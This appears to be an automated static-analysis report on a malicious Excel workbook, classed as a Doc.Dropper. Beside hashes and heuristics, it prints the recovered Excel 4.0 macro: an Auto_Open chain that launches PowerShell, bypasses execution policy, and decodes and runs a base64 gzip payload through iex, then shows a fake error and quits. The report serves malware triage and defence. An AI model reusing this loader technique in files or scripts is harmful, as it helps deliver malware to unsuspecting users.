Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f424b6eb3b855c89…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 43.5 KB
Created: 2020-03-31 08:17:24
Authoring application: Microsoft Excel
First seen: 2020-07-24
MD5: ad7677318e9ff63fa0ace3ab445d036f
SHA-1: f8705b9f5fa84a9df85320680b1430329664eabc
SHA-256: f424b6eb3b855c89e4d2329115e1c43b8da179d40750b7aee1d192d700610331
Risk score: 240

Malware Insights

MITRE ATT&CK
  • T1059.001 PowerShell
  • T1566.001 Spearphishing Attachment

The file contains Excel 4.0 (XLM) macros with an Auto_Open entry, which is a critical indicator of malicious intent. The XLM macro explicitly calls PowerShell and attempts to bypass execution policy using 'Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process -Force~'. This suggests the macro is designed to download and execute a second-stage payload. The presence of VBA macros and ClamAV detection further supports its malicious nature.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-7644833-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-7644833-0
  • Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME)
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • Reference to PowerShell (high, SC_STR_POWERSHELL)
    Reference to PowerShell
  • Suspicious extracted artifact (high, EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN)
    Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • VBA macros detected (medium, OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 6300 bytes
SHA-256: 44d44205f6a1d6a4798d4f6f844957c8421c7298afaa50d4f77536927f3da959
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 shell/COM execution token(s). 83 of 154 identifiers look randomly generated (e.g. 'Jbh5d1fIUF1yD872ujxXMjWhJ6QllCxOM1uKKjec') — consistent with name-mangling obfuscation. Carved artifact contains 5 long base64-like blob(s). Carved macro source contains an auto-exec entry point and execution/download terms.
Preview script
First 1,000 lines of the extracted script
' 0085     10 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, very hidden -  f
' 0085     15 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Foglio
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  f!C4049 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  f,A1,"",1.00000000000000000000
'  f,F12,"",5.00000000000000000000
'  f,H52,"",8.00000000000000000000
'  f,C83,"",4.00000000000000000000
'  f,C168,"",0.00000000000000000000
'  f,C4049,ERROR(FALSE),""
'  f,C4050,EXEC("powershell"),""
'  f,C4051,WAIT(NOW()+"00:00:01"),""
'  f,C4052,"SEND.KEYS("$h={(}Get-Process -Id $pid{)}.MainWindowHandle;$ios={[}Runtime.InteropServices.HandleRef{]};$hw=New-Object $ios {(}1,$h{)};$i=New-Object $ios{(}2,0{)};{(}{(}{[}reflection.assembly{]}::LoadWithPartialName{(}"WindowsBase"{)}{)}.GetType{(}"MS.Win32.Unsafe",TRUE)",""
'  f,C4053,"SEND.KEYS("NativeMethods"{)}{)}::SetWindowPos{(}$hw,$i,0,0,100,100,16512{)}~",TRUE)",""
'  f,C4054,WAIT(NOW()+"00:00:01"),""
'  f,C4055,"SEND.KEYS("if {(}{[}IntPtr{]}::Size -ne 4{)}{{}& $env:SystemRoot\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe{}}~",TRUE)",""
'  f,C4056,WAIT(NOW()+"00:00:00"),""
'  f,C4057,"SEND.KEYS("Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process -Force~",TRUE)",""
'  f,C4058,WAIT(NOW()+"00:00:01"),""
'  f,C4059,"SEND.KEYS("$b="H4sIAAAAAAAEAE1W6ZKiyBZ{+}FaOiZyzDKTdwoSfmByqbsgmIQsfEFSHZZBOQRcd3vwlWdXdFZErJyfMt52Smf3beO9/EzBVC8AP9t/8tkemYAz8Q{+}Nytur33CJQf8dIHZt7pePHAjMMkBZnsxfzAImzWyIkslwice/8ha3JOcAMmHnAgjCX4XwqM8N/ODzOOCiAp/37/TkpCuDRkYobKSsrwznune1b3rDnbMISIpuZUPjqyS{+}wp",TRUE)",""
'  f,C4076,"SEND.KEYS("OrsE28DCLrYHi/gLp/PMh5Z/KEYj478qurP61qHGoM{+}2js6vae/weKe1XjhA0AAA==";nal no New-Object -F;iex {(}no IO.StreamReader{(}no IO.Compression.GZipStream{(}{(}no IO.MemoryStream -A @{(},{[}Convert{]}::FromBase64String{(}$b{)}{)}{)},{[}IO.Compression.Compressio",TRUE)",""
'  f,C4077,"SEND.KEYS("nMode{]}::Decompress{)}{)}{)}.ReadToEnd{(}{)}~{NUMLOCK}",TRUE)",""
'  f,C4078,WAIT(NOW()+"00:00:01"),""
'  f,C4079,APP.ACTIVATE(),""
'  f,C4080,ALERT("Excel non può aprire il file '"&GET.WORKBOOK(16)&"' "),""
'  f,C4081,QUIT(),""
Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 767 bytes
SHA-256: fb8f621f90ed16db10ec46cb2092d5dd772943f57a8b113de4f83497af2cb3a4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Questa_cartella_di_lavoro"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "f, 1, 0, MSForms, Frame"
Attribute VB_Control = "gem, 2, 1, MSForms, CommandButton"
Private Sub f_Layout()

End Sub